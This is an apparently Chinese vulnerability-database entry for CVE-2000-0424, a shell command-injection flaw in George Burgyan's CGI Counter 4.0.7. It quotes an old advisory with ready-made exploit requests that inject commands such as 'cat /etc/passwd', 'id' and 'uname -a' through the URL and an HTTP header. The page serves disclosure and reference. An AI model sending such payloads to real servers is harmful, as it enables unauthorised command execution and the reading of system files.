George Burgyan CGI Counter输入验证漏洞

George Burgyan CGI Counter输入验证漏洞

漏洞ID 1105830 漏洞类型 访问验证错误
发布时间 2000-05-15 更新时间 2005-05-02
图片[1]-George Burgyan CGI Counter输入验证漏洞-安全小百科CVE编号 CVE-2000-0424
图片[2]-George Burgyan CGI Counter输入验证漏洞-安全小百科CNNVD-ID CNNVD-200005-053
漏洞平台 CGI CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/19913
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200005-053
|漏洞详情
GeorgeBurgyan的TheCGIcounter4.0.7存在漏洞,远程攻击者可以通过shell元字符执行任意命令。
|漏洞EXP
source: http://www.securityfocus.com/bid/1202/info

Due to unchecked code that handles user input in George Burgyan's CGI Counter, remote execution of arbitrary commands at the same privilege level as the web server it is running on is possible.

Examples:

http://target/cgi-bin/counterfiglet/nc/f=;echo;w;uname%20-a;id

> telnet target www
GET /cgi-bin/counterfiglet/nc/f=;sh%20-c%20"$HTTP_X" HTTP/1.0
X: pwd;ls -la /etc;cat /etc/passwd

> telnet target www
GET /cgi-bin/counter/nl/ord/lang=english(1);system("$ENV{HTTP_X}"); HTTP/1.0
X: echo;id;uname -a;w
|参考资料

来源:BUGTRAQ
名称:20000514VulnerabilityinCGIcounter4.0.7byGeorgeBurgyan
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:1202
链接:http://www.securityfocus.com/bid/1202

相关推荐: DCP-Portal 3.7/4.x/5.x – Multiple HTML Injection Vulnerabilities

DCP-Portal 3.7/4.x/5.x – Multiple HTML Injection Vulnerabilities 漏洞ID 1054705 漏洞类型 发布时间 2004-10-06 更新时间 2004-10-06 CVE编号 N/A CNNVD…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享